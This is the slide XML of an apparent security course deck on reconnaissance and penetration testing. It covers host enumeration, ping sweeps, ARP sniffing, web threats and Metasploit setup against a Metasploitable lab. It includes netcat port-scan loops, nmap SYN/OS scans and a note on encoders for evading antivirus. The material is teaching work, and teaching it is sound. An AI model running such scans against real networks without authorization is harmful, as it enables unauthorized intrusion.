                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="286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need</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3131" spc="279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baseline="1207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3131" spc="286" baseline="120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3131" spc="88" baseline="1207" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>examine </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2087" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>every</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2087" spc="28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spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>layer.</a:t>
            </a:r>
            <a:endParaRPr sz="2087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7030-07BC-1000-287E-ED7B7AC1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beyond firewall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FE700-C935-B2FF-684B-B25344FF1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839EC-9308-33CD-7826-B3C2F3421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074" y="1346443"/>
            <a:ext cx="5925986" cy="4883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20C810-A73A-B57D-EFB9-C6B8F19DA2AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4703618" y="2459182"/>
            <a:ext cx="958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AEBAB3-1486-C4A1-ADC4-CEE4B50E970E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2199503" y="2254423"/>
            <a:ext cx="255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packet filters active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FF3B5-2B56-2609-E2B6-5D632B8327BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691978" y="3280719"/>
            <a:ext cx="447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WAFW00F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E2D6E-135A-751F-6606-1F987336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1" y="4034481"/>
            <a:ext cx="4740238" cy="24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5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16F3-7100-3A42-893E-20E22D9B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Host Enumeration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9D60B-28FC-8258-9A85-5D9FE57F1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911E3-08AB-6B1A-A7E0-5904032D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72" y="1774429"/>
            <a:ext cx="10044545" cy="42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E8FB-E6E4-01A5-ABBC-72EA899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Gaining Information about Life Hosts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D4E40-8CE6-85D8-310A-E20E980CD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77C6C-F5EB-7A55-2F23-61CE03F97E0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1828800"/>
            <a:ext cx="10245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Fingerprinting Ports:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>	Script line with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="F9F9F3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while read r; do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F9F9F3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nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="F9F9F3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-v -z $r 1-65535; done &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F9F9F3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iplist</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0">
              <a:solidFill>
                <a:srgbClr val="F9F9F3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800" b="0" i="0" u="none" strike="noStrike" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="F9F9F3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while read r; do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F9F9F3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nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="F9F9F3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-v -z target $r; done &lt; ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>	Requires files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>iplist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> / ports to process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Figerprinting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> OS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="0" i="0" u="none" strike="noStrike" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="F9F9F3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nmap -sS -O target.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:highlight>
                <a:srgbClr val="000000"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Large scale scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>masscan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1DB95-D121-B70D-610C-9604D8D8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3488"/>
            <a:ext cx="6890400" cy="15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0104-42AA-3150-0166-834B0AA1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DHCP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5C101-224C-4F82-0921-7C146E2F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874" y="2218483"/>
            <a:ext cx="7137022" cy="35863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C131A-E6D8-AB9F-F6C6-6BABC703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Security: 8- </a:t>
            </a:r>
            <a:fld id="{C4204591-24BD-A542-B9D5-F8D8A88D2FEE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2E7A4-D92B-A56D-5FBF-729F4BF1B081}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928255" y="2237509"/>
            <a:ext cx="226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Wireshark</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41650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E91F-A2DE-0ED6-D12B-FB9D5139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ARP Sniffing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D95EF-DBAB-25CA-AC36-486C23454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CF029-564C-9433-1B66-7B6002DF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647" y="2036217"/>
            <a:ext cx="6552243" cy="278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68CA7-87E9-5B64-B31D-D8BCF8F7753C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1136073" y="2036217"/>
            <a:ext cx="349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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> –v –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>sn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>IPRange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ARP broadcast sniffing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909F-5CE0-AFFC-E895-82A2675D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Ping Sweep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E4BA3-28C4-064B-607A-B9962FF27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88C48-7CC0-0F36-F7AF-E67FCFF3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5" y="1643208"/>
            <a:ext cx="9996055" cy="1928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2EA78D-DAF7-243F-BAD8-2DFFDE7EC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15" y="4710287"/>
            <a:ext cx="9996056" cy="568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8B3DBD-1776-6D4F-A6FD-4CEB65B94F54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1177636" y="4100945"/>
            <a:ext cx="964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firewall blocks ICMP traffic we limit the sweep to specific ports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27769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17CE-5902-9BE0-3052-0AFA3BBF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Aspects of Scanning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D22C8-99E9-191D-2403-3D1053453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177A5-B2C3-95B9-1654-3C7986439235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2050473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can leverage insights about operating systems and known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e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>rpcclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> to discover AD 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az</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> in Azure environments (CLI for azure)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comprehensive tools: LEGION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machine-learning assisted scanning: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e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>GyoiThon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> (Naïve Bayes)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9E83B-DBB7-72D7-23FD-7ADD5F61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36" y="2330528"/>
            <a:ext cx="6019800" cy="2088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DB73D-EB90-E63D-C425-EF590EF0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2" y="5166742"/>
            <a:ext cx="4473110" cy="894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407466-C90E-E6EF-F848-F11687055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764" y="4458016"/>
            <a:ext cx="5521036" cy="23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D719-DA00-F9F0-E1F2-85BCD0FC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comes after Scanning?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E4E2A-2B10-3BEA-32D5-98A786C53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D8A44-867C-B805-70D6-51A73604F194}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="644236" y="1302254"/>
            <a:ext cx="10411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Vulnerability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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> again</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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ym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>lua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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OWASP ZAP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OpenVAS (Open Vulnerability Assessment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Nessus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Threat Modelling  details to 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AA02B-E809-90D2-5962-F0848472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1" y="556734"/>
            <a:ext cx="2943273" cy="3245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AEA48-E1BB-9D44-8693-290C0F533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509" y="3638262"/>
            <a:ext cx="4942291" cy="301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D7479-05A3-4C85-A91B-60C6DC49F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45" y="3581400"/>
            <a:ext cx="5772956" cy="2624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3249E-6BB1-B41F-65A8-34D8B06F3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034" y="1264375"/>
            <a:ext cx="2747857" cy="30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Large Computer Servers">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A389F8D-3A81-9F04-7EF5-15144F711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1B817F-EC41-CA1F-57EE-B7F7D98B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Gaining Access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CDC5A-4284-76EA-E3D3-2505F12FB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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Security: 8- </a:t>
            </a:r>
            <a:fld id="{C4204591-24BD-A542-B9D5-F8D8A88D2FEE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128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74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449D-FA9C-3832-40DD-67B44EA9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Gaining Access Activities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3AAB4-8A26-8E5C-7C61-7E368F1A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4D916-14E9-09DB-7069-C0D79F9B9FD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028700" y="1943100"/>
            <a:ext cx="81909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Password Cracking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Exploiting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Escalating privileges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Hiding files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42878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z="3540" spc="103" dirty="0"/>
              <a:t>Securing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3540" spc="195" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3540" spc="59" dirty="0"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3540" spc="64" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3540" spc="118" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3540" spc="64" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3540" spc="113" dirty="0"/>
              <a:t>Application:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3540" spc="-73" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3540" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C23632"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threats!</a:t>
            </a:r>
            <a:endParaRPr sz="3540"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168400" y="1528233"/>
            <a:ext cx="4322763" cy="4294188"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="87598" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="322166" indent="-311216">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="690"/>
              </a:spcBef>
              <a:buSzPct val="95348"/>
              <a:tabLst>
                <a:tab pos="299690" algn="l"/>
                <a:tab pos="300266" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr spc="64" dirty="0"/>
              <a:t>Application-</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-9" dirty="0"/>
              <a:t>Layer:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="683523" lvl="1" indent="-288739">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="599"/>
              </a:spcBef>
              <a:buSzPct val="95348"/>
              <a:tabLst>
                <a:tab pos="683523" algn="l"/>
                <a:tab pos="684099" algn="l"/>
              </a:tabLst>
            </a:pP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SQL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1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="683523" lvl="1" indent="-288739">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="604"/>
              </a:spcBef>
              <a:buSzPct val="95348"/>
              <a:tabLst>
                <a:tab pos="683523" algn="l"/>
                <a:tab pos="684099" algn="l"/>
              </a:tabLst>
            </a:pP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Cross-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Site-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Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="3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(XSS)</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="683523" marR="36885" lvl="1" indent="-288739">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:buSzPct val="95348"/>
              <a:tabLst>
                <a:tab pos="683523" algn="l"/>
                <a:tab pos="684099" algn="l"/>
              </a:tabLst>
            </a:pP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Cross-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Site</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="3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Request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="3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Forgery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(CSRF)</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="683523" lvl="1" indent="-288739">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="599"/>
              </a:spcBef>
              <a:buSzPct val="95348"/>
              <a:tabLst>
                <a:tab pos="683523" algn="l"/>
                <a:tab pos="684099" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1951" spc="41" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Authentication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Breakdown</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="683523" lvl="1" indent="-288739">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="604"/>
              </a:spcBef>
              <a:buSzPct val="95348"/>
              <a:tabLst>
                <a:tab pos="683523" algn="l"/>
                <a:tab pos="684099" algn="l"/>
              </a:tabLst>
            </a:pP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Unvalidated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18" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Input</a:t>
            </a:r>
            <a:endParaRPr sz="1951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363929"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr sz="2904" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="322166" indent="-311216">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buSzPct val="95348"/>
              <a:tabLst>
                <a:tab pos="299690" algn="l"/>
                <a:tab pos="300266" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Server-</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-9" dirty="0"/>
              <a:t>Layer:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="683523" lvl="1" indent="-288739">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="604"/>
              </a:spcBef>
              <a:buSzPct val="95348"/>
              <a:tabLst>
                <a:tab pos="683523" algn="l"/>
                <a:tab pos="684099" algn="l"/>
              </a:tabLst>
            </a:pP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Denial-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of-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Service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(DoS)</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="683523" lvl="1" indent="-288739">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="599"/>
              </a:spcBef>
              <a:buSzPct val="95348"/>
              <a:tabLst>
                <a:tab pos="683523" algn="l"/>
                <a:tab pos="684099" algn="l"/>
              </a:tabLst>
            </a:pP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OS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36" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
            <a:endParaRPr sz="1951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65494" y="1528233"/>
            <a:ext cx="3633011" cy="3400899"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="87598" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="299690" indent="-288739">
              <a:spcBef>
                <a:spcPts val="690"/>
              </a:spcBef>
              <a:buSzPct val="95348"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="299690" algn="l"/>
                <a:tab pos="300266" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1951" b="1" spc="64" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Network-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="1" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Layer:</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="683523" lvl="1" indent="-288739">
              <a:spcBef>
                <a:spcPts val="599"/>
              </a:spcBef>
              <a:buSzPct val="95348"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="683523" algn="l"/>
                <a:tab pos="684099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Packet-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Sniffing</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="683523" marR="4611" lvl="1" indent="-288739">
              <a:lnSpc>
                <a:spcPct val="125699"/>
              </a:lnSpc>
              <a:buSzPct val="95348"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="683523" algn="l"/>
                <a:tab pos="684099" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1951" spc="82" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Man-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In-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The-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Middle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Attacks (MITM)</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="683523" lvl="1" indent="-288739">
              <a:spcBef>
                <a:spcPts val="604"/>
              </a:spcBef>
              <a:buSzPct val="95348"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="683523" algn="l"/>
                <a:tab pos="684099" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1951" spc="222" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" spc="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Attack</a:t>
            </a:r>
            <a:endParaRPr sz="1951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363929"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr sz="2904" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="299690" indent="-288739">
              <a:buSzPct val="95348"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="299690" algn="l"/>
                <a:tab pos="300266" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1951" b="1" spc="50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>User-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1951" b="1" spc="-9" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Layer:</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1067932" lvl="1" indent="-288739">
              <a:spcBef>
                <a:spcPts val="599"/>
              </a:spcBef>
              <a:buSzPct val="95348"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1067932" algn="l"/>
                <a:tab pos="1068508" algn="l"/>
              </a:tabLst>
            </a:pP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Phishing</a:t>
            </a:r>
            <a:endParaRPr sz="1951" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1067932" lvl="1" indent="-288739">
              <a:spcBef>
                <a:spcPts val="604"/>
              </a:spcBef>
              <a:buSzPct val="95348"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1067932" algn="l"/>
                <a:tab pos="1068508" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1951" spc="82" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="363929"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Key-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logging</a:t>
            </a:r>
            <a:endParaRPr sz="1951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A131-C091-1E39-AB9E-22458500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Metasploit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2F646-96C5-2576-C69F-D7A81710A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BD2C2-3B77-8945-883B-A1DE0EF1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42" y="1546526"/>
            <a:ext cx="6916115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DD2B-0A38-75ED-4109-FAAE36D3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 Interface and modules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41891-9E4E-5D30-7150-76E768F4F88E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Exploits: code to target specific vulns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Payloads: malicious code to inject after successful exploitation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Auxiliary modules: supporting functions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Post modules: following successful attacks, they run on compromised targets to gather useful data and pivot attacker deeper into network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Encoders: to bypass antivirus defenses (obfuscating signatures)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No operations (NOPs: buffer overflow attacks)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FA160-28A3-B81B-EC60-506E31C6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61440"/>
            <a:ext cx="6903720" cy="39351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A0C28A-C6BA-7F65-553E-E8A756DD4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Security: 8- </a:t>
            </a:r>
            <a:fld id="{C4204591-24BD-A542-B9D5-F8D8A88D2FEE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1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E818-868A-CC20-F9FC-266DC548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Prepare Metasploit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1DC36-FCF1-B38A-9938-79C0BC7E688A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Run Postgre: systemctl start postgresql.service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Init Metasploit database: sudo msfdb init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Access msfconsole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Check db_status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Create workspace (check workspace –h)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Start hacking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7B88D-B0F4-2271-25F9-B0A1D95A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43" y="2930768"/>
            <a:ext cx="6365063" cy="32780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5EE0D-C284-CCD9-08B7-F739CE2D3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Security: 8- </a:t>
            </a:r>
            <a:fld id="{C4204591-24BD-A542-B9D5-F8D8A88D2FEE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08B23-F269-A901-24FA-1809B88B7E08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5673969" y="2121408"/>
            <a:ext cx="588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scan a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Linux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="420421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C9F2-B734-5ED5-9E8A-A9FA30C8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the scan: explore the vulnerabilities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D5394-AB51-FD82-07CE-E4E790583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9CAFF-78AD-D0A0-4FAC-07C33A28D5B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
